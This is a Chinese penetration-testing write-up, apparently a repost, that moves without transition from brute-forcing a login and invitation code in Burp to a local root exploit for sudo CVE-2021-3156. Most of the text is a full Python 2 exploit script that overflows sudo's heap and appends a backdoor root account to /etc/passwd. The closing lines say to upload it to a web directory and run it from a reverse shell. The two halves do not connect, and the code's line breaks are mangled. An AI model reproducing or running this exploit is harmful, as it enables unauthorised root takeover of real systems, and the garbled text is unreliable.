文章来源:奇安信攻防社区(带头小哥)
原文地址:https://forum.butian.net/share/1096
开局又是一个登录框,扫了目录也没有其他入口。难道又要祭出拿手绝招(爆破弱口令)吗?思路清晰,开搞。
看到有一个立即注册和忘记密码觉得可以搞一搞。
首先打开立即注册页面
之前以为这个邀请码是随便输入的,看来是不行的,用burp爆破一下邀请码吧。
那我们用burp来导入常见中文姓名来尝试爆破。
可以看到中文账号这里是经过url编码的,如果我们直接把中文导入burp是会乱码的。像这样
我们来匹配“密码不正确”这一响应。由于响应是经过编码的,需要先用 Python 把“密码不正确”转换成十六进制再进行匹配。
Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。
2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。
当在类 Unix 操作系统上执行命令时,非 root 用户可以使用 sudo 命令以 root 用户身份执行命令。由于 sudo 在处理命令行参数中的反斜杠转义时存在错误,导致堆缓冲区溢出,从而允许任何本地用户(无论是否在 sudoers 文件中)获得 root 权限,无需通过身份验证,且攻击者不需要知道用户密码。
安全研究人员于1月26日公开披露了此漏洞,并表示该漏洞已经隐藏了近十年。
影响范围
Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
查看一下sudo的版本,可以看到这个版本是存在漏洞的。
#!/usr/bin/pythonimport os
import sys
import resourcefrom struct import packfrom ctypes import cdll, c_char_p, POINTER
SUDO_PATH = b'/usr/bin/sudo'PASSWD_PATH = '/etc/passwd'APPEND_CONTENT = b'aa:$5$AZaSmJBP$lsgF8hex//kd.G4XxUJGaS618ZtYoQ796UpkM/8Ucm3:0:0:gg:/root:/bin/bash\n';#STACK_ADDR_PAGE = 0x7fffffff1000 # for ASLR disabledSTACK_ADDR_PAGE = 0x7fffe5d35000libc = cdll.LoadLibrary('libc.so.6')
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
def execve(filename, cargv, cenvp):
libc.execve(filename, cargv, cenvp)
def spawn_raw(filename, cargv, cenvp):
pid = os.fork() if pid: # parent
_, exit_code = os.waitpid(pid, 0) return exit_code else: # child
execve(filename, cargv, cenvp) exit(0)
def spawn(filename, argv, envp):
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(env))(*env) return spawn_raw(filename, cargv, cenvp)
resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))# expect large hole for cmnd size is correctTARGET_CMND_SIZE = 0x1b50argv = [ 'sudoedit', '-A', '-s', PASSWD_PATH, 'A'*(TARGET_CMND_SIZE-0x10-len(PASSWD_PATH)-1)+'\\', None ]
SA = STACK_ADDR_PAGE
ADDR_REFSTR = pack('<Q', SA+0x20) # ref stringADDR_PRIV_PREV = pack('<Q', SA+0x10)
ADDR_CMND_PREV = pack('<Q', SA+0x18) # cmndspecADDR_MEMBER_PREV = pack('<Q', SA+0x20)
ADDR_DEF_VAR = pack('<Q', SA+0x10)
ADDR_DEF_BINDING = pack('<Q', SA+0x30)
OFFSET = 0x30 + 0x20ADDR_USER = pack('<Q', SA+OFFSET)
ADDR_MEMBER = pack('<Q', SA+OFFSET+0x40)
ADDR_CMND = pack('<Q', SA+OFFSET+0x40+0x30)
ADDR_PRIV = pack('<Q', SA+OFFSET+0x40+0x30+0x60)# for sprayingepage = [ 'A'*0x8 + # to not ending with 0x00
# fake def->var chunk (get freed)
'\x21', '', '', '', '', '', '',
ADDR_PRIV[:6], '', # pointer to privilege
ADDR_CMND[:6], '', # pointer to cmndspec
ADDR_MEMBER[:6], '', # pointer to member
# fake def->binding (list head) (get freed)
'\x21', '', '', '', '', '', '', '', '', '', '', '', '', '', '', # members.first
'A'*0x10 + # members.last, pad
# userspec chunk (get freed)
'\x41', '', '', '', '', '', '', # chunk metadata
'', '', '', '', '', '', '', '', # entries.tqe_next
'A'*8 + # entries.tqe_prev
'', '', '', '', '', '', '', '', # users.tqh_first
ADDR_MEMBER[:6]+'', '', # users.tqh_last
'', '', '', '', '', '', '', '', # privileges.tqh_first
ADDR_PRIV[:6]+'', '', # privileges.tqh_last
'', '', '', '', '', '', '', '', # comments.stqh_first
# member chunk
'\x31', '', '', '', '', '', '', # chunk size , userspec.comments.stqh_last (can be any)
'A'*8 + # member.tqe_next (can be any), userspec.lineno (can be any)
ADDR_MEMBER_PREV[:6], '', # member.tqe_prev, userspec.file (ref string)
'A'*8 + # member.name (can be any because this object is not freed)
pack('<H', 284), '', # type, negated
'A'*0xc+ # padding
# cmndspec chunk
'\x61'*0x8 + # chunk metadata (need only prev_inuse flag)
'A'*0x8 + # entries.tqe_next
ADDR_CMND_PREV[:6], '', # entries.teq_prev
'', '', '', '', '', '', '', '', # runasuserlist
'', '', '', '', '', '', '', '', # runasgrouplist
ADDR_MEMBER[:6], '', # cmnd
'\xf9'+'\xff'*0x17+ # tag (NOPASSWD), timeout, notbefore, notafter
'', '', '', '', '', '', '', '', # role
'', '', '', '', '', '', '', '', # type
'A'*8 + # padding
# privileges chunk
'\x51'*0x8 + # chunk metadata
'A'*0x8 + # entries.tqe_next
ADDR_PRIV_PREV[:6], '', # entries.teq_prev
'A'*8 + # ldap_role
'A'*8 + # hostlist.tqh_first
ADDR_MEMBER[:6], '', # hostlist.teq_last
'A'*8 + # cmndlist.tqh_first
ADDR_CMND[:6], '', # cmndlist.teq_last]
cnt = sum(map(len, epage))
padlen = 4096 - cnt - len(epage)
epage.append('P'*(padlen-1))
env = [ 'A'*(7+0x4010 + 0x110) + # overwrite until first defaults
'\x21\\', '\\', '\\', '\\', '\\', '\\', '\\',
'A'*0x18 +
# defaults
'\x41\\', '\\', '\\', '\\', '\\', '\\', '\\', # chunk size
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', # next
'a'*8 + # prev
ADDR_DEF_VAR[:6]+'\\', '\\', # var
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', # val
ADDR_DEF_BINDING[:6]+'\\', '\\', # binding
ADDR_REFSTR[:6]+'\\', '\\', # file
'Z'*0x8 + # type, op, error, lineno
'\x31\\', '\\', '\\', '\\', '\\', '\\', '\\', # chunk size (just need valid)
'C'*0x638+ # need prev_inuse and overwrite until userspec
'B'*0x1b0+ # userspec chunk
# this chunk is not used because list is traversed with curr->prev->prev->next
'\x61\\', '\\', '\\', '\\', '\\', '\\', '\\', # chunk size
ADDR_USER[:6]+'\\', '\\', # entries.tqe_next points to fake userspec in stack
'A'*8 + # entries.tqe_prev
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', # users.tqh_first
ADDR_MEMBER[:6]+'\\', '\\', # users.tqh_last
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '', # privileges.tqh_first
'LC_ALL=C', 'SUDO_EDITOR=/usr/bin/tee -a', # append stdin to /etc/passwd
'TZ=:',
]
ENV_STACK_SIZE_MB = 4for i in range(ENV_STACK_SIZE_MB * 1024 / 4):
env.extend(epage)# last element. prepare space for '/usr/bin/sudo' and extra 8 bytesenv[-1] = env[-1][:-len(SUDO_PATH)-1-8]
env.append(None)
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(env))(*env)# write passwd line in stdin. it will be added to /etc/passwd when success by 'tee -a'r, w = os.pipe()
os.dup2(r, 0)
w = os.fdopen(w, 'w')
w.write(APPEND_CONTENT)
w.close()
null_fd = os.open('/dev/null', os.O_RDWR)
os.dup2(null_fd, 2)for i in range(8192):
sys.stdout.write('%d\r' % i) if i % 8 == 0:
sys.stdout.flush()
exit_code = spawn_raw(SUDO_PATH, cargv, cenvp) if exit_code == 0: print('success at %d' % i) break
这个脚本需要使用 Python 2 运行,部分 CentOS 系统自带了 Python。
把脚本上传到网站目录,然后反弹一个交互shell,运行脚本。
巧用BP还要心细。
转自李白你好